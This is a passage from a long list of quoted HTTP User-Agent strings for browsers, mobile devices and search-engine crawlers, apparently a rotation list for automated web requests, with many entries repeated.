'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; 
rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; 
ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) 
AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) 
Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', 'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)', 'Wget/1.8.2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0', 'Mediapartners-Google/2.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7', 'Mozilla/4.04 [en] (WinNT; I)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)', 'lwp-trivial/1.41', 'NetBSD-ftp/20031210', 'Dillo/0.8.5-i18n-misc', 'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)', 'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)', 'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 